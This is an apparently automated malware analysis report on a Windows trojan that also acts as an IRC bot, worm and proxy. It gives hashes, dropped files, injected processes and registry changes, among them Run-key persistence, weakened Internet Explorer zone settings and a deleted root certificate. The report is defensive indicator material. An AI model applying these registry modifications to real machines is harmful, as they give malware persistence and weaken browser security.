HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.GenericKD.1742492 (B) (Emsisoft), Trojan.GenericKD.1742492 (AdAware), GenericIRCBot.YR, GenericMSNWorm.YR, Rbot.YR, GenericAutorunWorm.YR, BackdoorIRC.YR, Blazebot.YR, GenericProxy.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor, Worm, WormAutorun, IRCBot, MSNWorm, Trojan-Proxy
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9cd12e0ded6da0d4f7c2d60be46bfb13
SHA1: 5888b67ff3eedc360bc84c3b2fd5a3c38af99f50
SHA256: ad9ee206031965e7e9d2603f5e2e2311c8a4be484085b61b92aa28568114daba
SSDeep: 12288:qK2mhAMJ/cPlcWxdFB1kFbUbKoOY6RQ7JK8rxLYZneENukuo:b2O/Gl3vr1mJIJK8rxLyubo
Size: 518387 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-06-09 16:19:49
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via IRC channel. |
MSNWorm | A worm can spread its copies through MSN Messenger. |
Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
Process activity
The Trojan creates the following process(es):
pwyqire.exe:1312
rep.exe:1920
rep.exe:292
20.exe:464
20.exe:2012
hggjgh.exe:656
hggjgh.exe:1884
systemj.exe:456
system.exe:1088
%original file name%.exe:1036
iexplorer.exe:596
The Trojan injects its code into the following process(es):
pwyqire.exe:500
iexplorer.exe:1652
csrss.exe:492
Mutexes
The following mutexes were created/opened: No objects were found.
File activity
The process pwyqire.exe:1312 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\L43K77.DQ9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (1249 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\L43K77.DQ9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (0 bytes)
The process pwyqire.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\120[1].exe (588384 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\rep[1].exe (483032 bytes)
%WinDir%\systemj.exe (589016 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[1].txt (169 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (2712 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[2].txt (373 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[2].txt (169 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4916 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[1].txt (511 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%WinDir%\system.exe (483944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Cab8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@dropbox[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar6.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.dropbox[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (0 bytes)
The process rep.exe:1920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\csrss.exe (5441 bytes)
The process rep.exe:292 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Q32K34.WE9 (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB.tmp (1137 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Q32K34.WE9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autB.tmp (0 bytes)
The process 20.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\I75K82.HU9 (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autC.tmp (1241 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\I75K82.HU9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autC.tmp (0 bytes)
The process 20.exe:2012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\iexplorer.exe (5873 bytes)
The process hggjgh.exe:656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\pwyqire.exe (5441 bytes)
The process hggjgh.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (1249 bytes)
%Documents and Settings%\%current user%\L43K77.DQ9 (601 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (0 bytes)
%Documents and Settings%\%current user%\L43K77.DQ9 (0 bytes)
The process systemj.exe:456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\J50H\20.exe (9665 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\J50H\__tmp_rar_sfx_access_check_1228515 (0 bytes)
The process system.exe:1088 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\J50H\rep.exe (9665 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\J50H\__tmp_rar_sfx_access_check_1228046 (0 bytes)
The process %original file name%.exe:1036 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\L75C\hggjgh.exe (10537 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\L75C\__tmp_rar_sfx_access_check_1210343 (0 bytes)
The process iexplorer.exe:596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\I75K82.HU9 (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autD.tmp (1241 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\I75K82.HU9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\autD.tmp (0 bytes)
Registry activity
The process pwyqire.exe:1312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 90 FB 4C EE 3E 1C 7C 5B 86 D9 39 40 9C 0B 6F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process pwyqire.exe:500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\yOLE]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\SYSTEM\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "pwyqire.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\yOLE]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\System\CurrentControlSet\Control\Lsa]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"systemj.exe" = "SSH, Telnet and Rlogin client"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 79 3D 8F 13 20 DD 0C 8C A0 20 B3 AF 97 EE 49"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4]
"Blob" = "19 00 00 00 01 00 00 00 10 00 00 00 63 66 4B 08"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"system.exe" = "SSH, Telnet and Rlogin client"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Supports RAS Connections" = "pwyqire.exe"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Supports RAS Connections" = "pwyqire.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runservices]
"Supports RAS Connections" = "pwyqire.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"2796BAE63F1801E277261BA0D77770028F20EEE4"
The process rep.exe:1920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 D4 89 6F 45 56 92 C1 03 97 B8 97 DD EF 70 5B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Remote Registry Service" = "csrss.exe"
The process rep.exe:292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 A3 82 3C 13 15 F5 26 EB EF 08 AA 91 3B 97 02"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 20.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 6A 91 E2 4B C2 EF 32 5C 8D 8D D5 44 7A 72 0A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 20.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 32 DF E0 50 A2 CE B2 EE C5 7B 62 75 CD F4 F9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process hggjgh.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A F8 D0 5B 9A F7 5E 23 17 7F 5D C9 EE D0 8A 64"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
The process hggjgh.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 77 9E 18 22 8E D4 FA 76 5A 63 1B 15 52 EC FE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process systemj.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 CB 68 CE 4D 08 6D 43 E0 B7 0F BE 56 ED 2C 7A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\J50H]
"20.exe" = "20"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process system.exe:1088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 C8 F1 49 44 BE 65 19 65 A2 29 C0 6A 22 CB 4B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\J50H]
"rep.exe" = "rep"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:1036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 77 DF 13 4D B7 DA E3 AB D3 C4 EE 2F 50 0A CD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
